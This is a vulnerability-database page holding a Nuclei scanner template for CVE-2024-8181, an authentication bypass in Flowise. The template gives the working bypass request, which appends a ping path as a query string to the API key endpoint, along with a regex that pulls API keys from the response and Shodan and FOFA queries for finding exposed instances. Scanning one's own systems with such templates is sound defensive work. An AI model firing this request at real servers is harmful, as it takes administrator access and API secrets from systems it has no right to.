Vulners
Lucene search
Flowise <= 1.8.2 Authentication Bypass
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2024-8181 | 27 Aug 202415:43 | – | circl |
 | Flowise 安全漏洞 | 27 Aug 202400:00 | – | cnnvd |
 | CVE-2024-8181 | 27 Aug 202413:10 | – | cve |
 | CVE-2024-8181 Flowise Authentication Bypass | 27 Aug 202413:10 | – | cvelist |
 | Flowise Authentication Bypass vulnerability | 27 Aug 202415:32 | – | github |
 | CVE-2024-8181 | 27 Aug 202413:15 | – | nvd |
 | GHSA-2Q4W-X8H2-2FVH Flowise Authentication Bypass vulnerability | 27 Aug 202415:32 | – | osv |
 | PT-2024-38860 | 27 Aug 202400:00 | – | ptsecurity |
 | CVE-2024-8181 | 4 Feb 202522:33 | – | redhatcve |
 | Authentication Bypass | 28 Aug 202404:19 | – | veracode |
10
id: CVE-2024-8181
info:
name: Flowise <= 1.8.2 Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality.
impact: |
Unauthenticated attackers can bypass authentication to access administrative API endpoints, gaining unauthorized access to restricted functionality, API keys, and administrative operations.
remediation: |
Update Flowise to a version later than 1.8.2 to address the authentication bypass vulnerability.
reference:
- https://www.tenable.com/security/research/tra-2024-33
- https://tenable.com/security/research/tra-2024-22-0
- https://nvd.nist.gov/vuln/detail/CVE-2024-8181
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
cvss-score: 7.3
cve-id: CVE-2024-8181
epss-score: 0.60842
epss-percentile: 0.98326
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-2051052918
fofa-query: title:"Flowise"
tags: tenable,cve,cve2024,flowise,auth-bypass,vkev,vuln,ai
http:
- raw:
- |
GET /api/v1/apikey?/api/v1/ping HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Referer: {{RootURL}}/document-stores
matchers-condition: and
matchers:
- type: word
part: body
words:
- "apiKey"
- "apiSecret"
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: regex
name: apiKey
part: body
internal: false
group: 1
regex:
- '"apiKey":"([^"]+)"'
# digest: 4a0a0047304502201f844e8874900a04642695371a60ae528ac2cb8410dad86be4a8850a2e0fa9dd022100f35a472eb8c320c487beb1f52c1ce8d685b9a6b872aa8dc932884a0a61dd6fcf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.18.1 - 9.8
EPSS0.60842
SSVC